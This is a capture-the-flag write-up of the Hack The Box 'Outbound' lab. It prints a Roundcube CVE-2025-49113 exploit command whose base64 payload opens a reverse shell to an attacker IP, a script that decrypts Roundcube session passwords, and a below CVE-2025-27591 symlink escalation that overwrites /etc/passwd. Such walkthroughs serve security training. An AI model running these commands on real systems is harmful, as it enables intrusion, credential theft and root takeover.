HTB-OutBound

This article was last updated on the afternoon of 17 July 2025

Outbound

As is common in real life pentests, you will start the Outbound box with credentials for the following account tyler / LhKL1o9Nm3X2

Information Gathering

nmap

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Two open ports, and the HTTP redirect reveals the hostname mail.outbound.htb (add it to /etc/hosts before browsing).

Web

A webmail frontend: Roundcube.


Log in with the given credentials and check the version info: it is 1.6.10. Searching for that version turns up an RCE, CVE-2025-49113 - Roundcube Remote Code Execution (fixed in 1.6.11 and 1.5.10).

CVE-2025-49113

The vulnerability is post-authentication: once logged in, an HTTP request carrying a malicious _from parameter triggers it. The _from value is not validated in program/actions/settings/upload.php and ends up in PHP object deserialization, so an authenticated user can supply a gadget chain and execute commands on the server.

POC:https://github.com/hakaioffsec/CVE-2025-49113-exploit

php CVE-2025-49113.php <url> <username> <password> <command>

Run it in that format to get a reverse shell. The base64 payload below decodes to a PHP fsockopen() reverse shell to 10.10.16.45:1234 (the attacker's listener; substitute your own IP and port):

php CVE-2025-49113.php http://mail.outbound.htb/ tyler "LhKL1o9Nm3X2" 'echo L3Vzci9iaW4vcGhwIC1yICckc29jaz1mc29ja29wZW4oIjEwLjEwLjE2LjQ1IiwxMjM0KTtleGVjKCIvYmluL2Jhc2ggPCYzID4mMyAyPiYzIik7Jw== | base64 -d | bash'


I tried sudo -l first, which got nowhere, but while logged in as tyler I found something database-related.

Use the database to find the password stored in the session

config.inc.php in /var/www/html/roundcube/config holds the database configuration:

<?php

/*
+-----------------------------------------------------------------------+
| Local configuration for the Roundcube Webmail installation.           |
|                                                                       |
| This is a sample configuration file only containing the minimum       |
| setup required for a functional installation. Copy more options       |
| from defaults.inc.php to this file to override the defaults.          |
|                                                                       |
| This file is part of the Roundcube Webmail client                     |
| Copyright (C) The Roundcube Dev Team                                  |
|                                                                       |
| Licensed under the GNU General Public License version 3 or            |
| any later version with exceptions for skins & plugins.                |
| See the README file for a full license statement.                     |
+-----------------------------------------------------------------------+
*/

$config = [];

// Database connection string (DSN) for read+write operations
// Format (compatible with PEAR MDB2): db_provider://user:password@host/database
// Currently supported db_providers: mysql, pgsql, sqlite, mssql, sqlsrv, oracle
// For examples see http://pear.php.net/manual/en/package.database.mdb2.intro-dsn.php
// NOTE: for SQLite use absolute path (Linux): 'sqlite:////full/path/to/sqlite.db?mode=0646'
// or (Windows): 'sqlite:///C:/full/path/to/sqlite.db'
$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';

// IMAP host chosen to perform the log-in.
// See defaults.inc.php for the option description.
$config['imap_host'] = 'localhost:143';

// SMTP server host (for sending mails).
// See defaults.inc.php for the option description.
$config['smtp_host'] = 'localhost:587';

// SMTP username (if required) if you use %u as the username Roundcube
// will use the current username for login
$config['smtp_user'] = '%u';

// SMTP password (if required) if you use %p as the password Roundcube
// will use the current user's password for login
$config['smtp_pass'] = '%p';

// provide an URL where a user can get support for this Roundcube installation
// PLEASE DO NOT LINK TO THE ROUNDCUBE.NET WEBSITE HERE!
$config['support_url'] = '';

// Name your service. This is displayed on the login screen and in the window title
$config['product_name'] = 'Roundcube Webmail';

// This key is used to encrypt the users imap password which is stored
// in the session record. For the default cipher method it must be
// exactly 24 characters long.
// YOUR KEY MUST BE DIFFERENT THAN THE SAMPLE VALUE FOR SECURITY REASONS
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';

// List of active plugins (in plugins/ directory)
$config['plugins'] = [
    'archive',
    'zipdownload',
];

// skin name: folder from skins/
$config['skin'] = 'elastic';
$config['default_host'] = 'localhost';
$config['smtp_server'] = 'localhost';

Log in to the database with the credentials from the DSN (note that des_key above is still the sample value shipped with Roundcube, which is what makes the session password recoverable later):

$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube'

mysql -u roundcube -pRCDBPass2025 -h localhost roundcube -e 'show databases; show tables;'

Using the roundcube database:

Database
information_schema
roundcube

Tables_in_roundcube
cache
cache_index
cache_messages
cache_shared
cache_thread
collected_addresses
contactgroupmembers
contactgroups
contacts
dictionary
filestore
identities
responses
searches
session
system
users

These are the tables. I looked at users first, but it holds no passwords (Roundcube authenticates against IMAP and only keeps the password, encrypted, in the session record), so the session table is the one to check:

mysql -u roundcube -pRCDBPass2025 -h localhost roundcube -e 'use roundcube;select * from session;' -E

The vars column is the PHP-serialized session, base64-encoded; decoding it gives:

language|s:5:"en_US";imap_namespace|a:4:{s:8:"personal";a:1:{i:0;a:2:{i:0;s:0:"";i:1;s:1:"/";}}s:5:"other";N;s:6:"shared";N;s:10:"prefix_out";s:0:"";}imap_delimiter|s:1:"/";imap_list_conf|a:2:{i:0;N;i:1;a:0:{}}user_id|i:1;username|s:5:"jacob";storage_host|s:9:"localhost";storage_port|i:143;storage_ssl|b:0;password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/";login_time|i:1749397119;timezone|s:13:"Europe/London";STORAGE_SPECIAL-USE|b:1;auth_secret|s:26:"DpYqv6maI9HxDL5GhcCd8JaQQW";request_token|s:32:"TIsOaABA1zHSXZOBpH6up5XFyayNRHaw";task|s:4:"mail";skin_config|a:7:{s:17:"supported_layouts";a:1:{i:0;s:10:"widescreen";}s:22:"jquery_ui_colors_theme";s:9:"bootstrap";s:18:"embed_css_location";s:17:"/styles/embed.css";s:19:"editor_css_location";s:17:"/styles/embed.css";s:17:"dark_mode_support";b:1;s:26:"media_browser_css_location";s:4:"none";s:21:"additional_logo_types";a:3:{i:0;s:4:"dark";i:1;s:5:"small";i:2;s:10:"small-dark";}}imap_host|s:9:"localhost";page|i:1;mbox|s:5:"INBOX";sort_col|s:0:"";sort_order|s:4:"DESC";STORAGE_THREAD|a:3:{i:0;s:10:"REFERENCES";i:1;s:4:"REFS";i:2;s:14:"ORDEREDSUBJECT";}STORAGE_QUOTA|b:0;STORAGE_LIST-EXTENDED|b:1;list_attrib|a:6:{s:4:"name";s:8:"messages";s:2:"id";s:11:"messagelist";s:5:"class";s:42:"listing messagelist sortheader fixedheader";s:15:"aria-labelledby";s:22:"aria-label-messagelist";s:9:"data-list";s:12:"message_list";s:14:"data-label-msg";s:18:"The list is empty.";}unseen_count|a:2:{s:5:"INBOX";i:2;s:5:"Trash";i:0;}folders|a:1:{s:5:"INBOX";a:2:{s:3:"cnt";i:2;s:6:"maxuid";i:3;}}list_mod_seq|s:2:"10";

It is user jacob's session, including the encrypted password and the auth_secret:

password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"
auth_secret|s:26:"DpYqv6maI9HxDL5GhcCd8JaQQW"

Decrypt Password

/var/www/html/roundcube/bin ships a decrypt.sh helper that decrypts the value directly with the configured des_key:


This gives the password 595mO8DmwGeD.

The same result can be obtained by hand:

The decryption routine lives in https://github.com/roundcube/roundcubemail/blob/master/program/lib/Roundcube/rcube.php:

    public function get_crypto_method()
    {
        return $this->get('cipher_method') ?: 'DES-EDE3-CBC';
    }

    /**
     * @param string $cipher Encrypted text
     * @param string $key    Encryption key to retrieve from the configuration, defaults to 'des_key'
     * @param bool   $base64 Whether or not input is base64-encoded
     *
     * @return string|false Decrypted text, false on error
     */
    public function decrypt($cipher, $key = 'des_key', $base64 = true)
    {
        // @phpstan-ignore-next-line
        if (!is_string($cipher) || !strlen($cipher)) {
            return false;
        }

        if ($base64) {
            $cipher = base64_decode($cipher, true);
            if ($cipher === false) {
                return false;
            }
        }

        $ckey    = $this->config->get_crypto_key($key);
        $method  = $this->config->get_crypto_method();
        $iv_size = openssl_cipher_iv_length($method);
        $tag     = null;

        if (preg_match('/^##(.{16})##/s', $cipher, $matches)) {
            $tag    = $matches[1];
            $cipher = substr($cipher, strlen($matches[0]));
        }

        $iv = substr($cipher, 0, $iv_size);

        // session corruption? (#1485970)
        if (strlen($iv) < $iv_size) {
            return false;
        }

        $cipher = substr($cipher, $iv_size);
        $clear  = openssl_decrypt($cipher, $method, $ckey, \OPENSSL_RAW_DATA, $iv, $tag);

        return $clear;
    }

From this code the cipher is DES-EDE3-CBC (3DES in CBC mode, the default when cipher_method is unset), the key is the 24-byte des_key from the config, and the IV is the first 8 bytes (the DES block size returned by openssl_cipher_iv_length) of the base64-decoded value; everything after those 8 bytes is the ciphertext proper, and openssl_decrypt removes the PKCS#7 padding itself. The ##...## tag prefix only applies to AEAD ciphers such as GCM and is absent here. Shown as hex, the IV for this session value is:

The result is:

iv = 2fb46fd3403c4eec

des_key comes from the config file above:

$config['des_key'] = 'rcmail-!24ByteDESkey*Str';
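As an added example (not from the original writeup and not Roundcube's own code), the following POSIX shell script redoes the two manual steps above offline: it pulls the password|s:N:"..." field out of a base64-encoded session vars value, then performs exactly what rcube::decrypt() does with the openssl CLI: strict base64 decode, split off the 8-byte IV, DES-EDE3-CBC decrypt with the 24-byte des_key, PKCS#7 padding stripped by openssl. The key and the ciphertext are the real values from this box; SAMPLE_VARS is a constructed fragment of the session row shown above, base64-encoded the way the real column is. GNU coreutils (od, base64, head, tail) and an openssl binary are assumed.

```shell
#!/bin/sh
# Added example: reproduce rcube::decrypt() for a Roundcube session password
# using only base64, od and the openssl CLI.

DES_KEY='rcmail-!24ByteDESkey*Str'   # $config['des_key'] from config.inc.php (24 bytes)

# Constructed subset of the session row: the real `vars` column is the whole
# serialized session, base64-encoded, so a fragment of it is encoded here.
SAMPLE_VARS=$(printf '%s' 'username|s:5:"jacob";password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/";' | base64 | tr -d '\n')

hex() { od -An -v -tx1 | tr -d ' \n'; }   # raw bytes on stdin -> lowercase hex string

# session_password <base64 vars>: decode the column and pull out the password field
session_password() {
    printf '%s' "$1" | base64 -d | grep -o 'password|s:[0-9]*:"[^"]*"' | sed 's/.*:"\(.*\)"/\1/'
}

# rc_decrypt <base64 ciphertext> [key]: the same steps as rcube::decrypt()
#   - base64-decode (strict, like PHP's base64_decode($cipher, true))
#   - first 8 bytes are the IV (openssl_cipher_iv_length('DES-EDE3-CBC') == 8)
#   - the rest is the ciphertext; openssl enc strips the PKCS#7 padding
# Fails on corrupt or too-short input, like the "session corruption" check in PHP.
rc_decrypt() {
    b64=$1; key=${2:-$DES_KEY}
    tmp=$(mktemp) || return 1
    if ! printf '%s' "$b64" | base64 -d > "$tmp" 2>/dev/null; then rm -f "$tmp"; return 1; fi
    if [ "$(wc -c < "$tmp" | tr -d ' ')" -le 8 ]; then rm -f "$tmp"; return 1; fi
    iv=$(head -c 8 "$tmp" | hex)
    keyhex=$(printf '%s' "$key" | hex)
    tail -c +9 "$tmp" | openssl enc -d -des-ede3-cbc -K "$keyhex" -iv "$iv"
    rc=$?
    rm -f "$tmp"
    return $rc
}

pw=$(session_password "$SAMPLE_VARS")
printf 'session password field: %s\n' "$pw"
printf 'decrypted IMAP password: %s\n' "$(rc_decrypt "$pw")"   # -> 595mO8DmwGeD
```

The 32-character base64 value is 24 raw bytes: an 8-byte IV plus two 8-byte DES blocks, which is exactly a 12-character password with 4 bytes of padding. Any Roundcube install that still carries the sample des_key is open to the same recovery by anyone who can read its session table.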

SSH login

Log in to the webmail as jacob with the decrypted password. His mailbox contains a mail with a new password, gY4Wr3a1evp4, which is the one that works for SSH.


User flag obtained.

Privilege escalation via below (CVE-2025-27591)

sudo -l shows jacob may run below as root:

jacob@outbound:~$ sudo -l
Matching Defaults entries for jacob on outbound:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User jacob may run the following commands on outbound:
    (ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d*

Searching for "below privilege escalation" turns up the CVE: the world-writable /var/log/below directory created by below lets local users escalate to root (CVE-2025-27591).

This vulnerability allows a local user to escalate to root by:

1. Symlinking /var/log/below/error_root.log to /etc/passwd
2. Triggering below (as root) to write to the symlink
3. Injecting a malicious root user into /etc/passwd

Generate a crypt(3) hash for the password that goes into /etc/passwd (traditional DES crypt with salt abc; with the hash placed directly in the second field, no shadow entry is needed):

└─# perl -e 'print crypt("butt3rf1y","abc")'
abvS2XoFvLJII

Then run the following from inside /var/log/below:

echo 'butt3rf1y:abvS2XoFvLJII:0:0:,,,:/root:/bin/bash' > butt3rf1y   # passwd entry for a uid 0 user
rm error_root.log                                                     # the directory is world-writable, so jacob can remove root's log
ln -s /etc/passwd /var/log/below/error_root.log                       # point root's log file at /etc/passwd
sudo /usr/bin/below                                                   # root follows the symlink when it (re)creates and chmods its log
cp butt3rf1y error_root.log                                           # cp writes through the symlink, replacing /etc/passwd
su butt3rf1y


Root obtained.

Afterwards n0o0b told me it only takes three commands to get root:

rm error_root.log
ln -s /etc/passwd error_root.log
sudo below
echo 'butt3rf1y:abvS2XoFvLJII:0:0::/root:/bin/bash' > /etc/passwd
su butt3rf1y

jacob@outbound:/var/log/below$ echo 'butt3rf1y:abvS2XoFvLJII:0:0::/root:/bin/bash' > /etc/passwd
jacob@outbound:/var/log/below$ su butt3rf1y
Password:
butt3rf1y@outbound:/var/log/below# id
uid=0(root) gid=0(root) groups=0(root)

The symlink does all the work: when root runs below it (re)creates its log file and makes it world-writable, and because error_root.log points at /etc/passwd that chmod lands on /etc/passwd itself, so jacob can write the uid 0 user into it directly. This is indeed simpler, and I learned something new. Two caveats for a real engagement: `>` truncates /etc/passwd to that single line (the cp in the first method replaces the file just the same), so `>>` is the less destructive choice; and the sudoers deny-list (`!--config*`, `!--debug*`, `!-d*`) gives no protection here, because the bug needs no option at all.
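As an added example, not part of the writeup, here is a small POSIX shell audit for the conditions this escalation depends on: a world-writable below log directory (the CVE-2025-27591 root cause), a symlink inside it whose target resolves outside the directory (the error_root.log -> /etc/passwd trick), and the post-exploitation state of a world-writable /etc/passwd. Paths are parameters so it can be exercised against a constructed temp tree; GNU coreutils (stat -c, readlink -f) are assumed.

```shell
#!/bin/sh
# Added example: audit a host for the below (CVE-2025-27591) symlink conditions.
# Assumes GNU coreutils (stat -c, readlink -f).

# world_writable <path>: succeeds if the "other" write bit is set (e.g. 777, 666);
# returns 2 if the path does not exist
world_writable() {
    mode=$(stat -c '%a' "$1" 2>/dev/null) || return 2
    case $mode in
        *[2367]) return 0 ;;   # last octal digit with the w bit set: 2, 3, 6, 7
        *)       return 1 ;;
    esac
}

# escape_symlinks <dir>: print every symlink in <dir> whose target resolves
# outside <dir>; error_root.log -> /etc/passwd is exactly this pattern
escape_symlinks() {
    dir=$(readlink -f "$1") || return 1
    for f in "$dir"/* "$dir"/.[!.]*; do
        [ -L "$f" ] || continue
        target=$(readlink -f "$f")
        case $target in
            "$dir"/*) ;;   # stays inside the log dir: not interesting
            *) printf '%s -> %s\n' "$f" "$target" ;;
        esac
    done
}

# audit_below <logdir> <passwd>: findings on stderr, number of findings on stdout
audit_below() {
    logdir=$1 passwd=$2 n=0
    if world_writable "$logdir"; then
        echo "[!] $logdir is world-writable: vulnerable below log dir" >&2; n=$((n+1))
    fi
    links=$(escape_symlinks "$logdir")
    if [ -n "$links" ]; then
        printf '[!] symlinks escaping %s:\n%s\n' "$logdir" "$links" >&2; n=$((n+1))
    fi
    if world_writable "$passwd"; then
        echo "[!] $passwd is world-writable: below already chmod'ed it through a symlink" >&2; n=$((n+1))
    fi
    echo "$n"
}

# Stand-alone run against the real paths
findings=$(audit_below /var/log/below /etc/passwd)
echo "findings: $findings"
```

On the box, running this as jacob after `sudo below` would report all three conditions; on a patched host the directory is not world-writable and the count is 0. The third check is worth keeping in an incident-response checklist on its own, since a world-writable /etc/passwd survives after the attacker cleans up the symlink.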


HTB-OutBound
http://example.com/2025/07/17/HTB-OutBound/
Author: butt3rf1y
Published: 17 July 2025